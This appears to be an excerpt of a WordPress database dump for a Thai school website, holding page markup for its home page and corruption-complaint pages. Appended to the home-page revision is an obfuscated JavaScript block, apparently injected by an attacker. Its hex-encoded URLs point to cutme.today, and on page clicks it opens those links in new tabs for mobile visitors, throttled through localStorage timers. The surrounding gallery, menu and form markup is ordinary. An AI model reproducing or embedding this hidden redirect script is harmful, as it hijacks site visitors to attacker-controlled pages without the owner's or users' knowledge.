{\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-02 10:57:39','2025-07-02 03:57:39','',14,'http://pakhaeng.ssk.in.th/?p=1609',0,'revision','',0),
(1611,1,'2025-07-02 11:02:38','2025-07-02 04:02:38','<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1733,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"https://script.google.com/macros/s/AKfycbykXdw223qDku5HZHXFc3dC3iBuYGklOMMgSwrL2niYi_0cBsuDlso21Pkuaws5E3bp/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/corruption.png\" alt=\"\" class=\"wp-image-1733\"/></a></figure>\n<!-- /wp:image -->','ร้องเรียนทุจริต','','publish','closed','closed','','%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95','','','2025-07-07 14:19:47','2025-07-07 07:19:47','',0,'http://pakhaeng.ssk.in.th/?page_id=1611',0,'page','',0),
(1612,1,'2025-07-02 11:02:38','2025-07-02 04:02:38','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode -->','ร้องเรียนทุจริต','','inherit','closed','closed','','1611-revision-v1','','','2025-07-02 11:02:38','2025-07-02 04:02:38','',1611,'http://pakhaeng.ssk.in.th/?p=1612',0,'revision','',0),
(1613,1,'2025-07-02 11:02:54','2025-07-02 04:02:54','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span 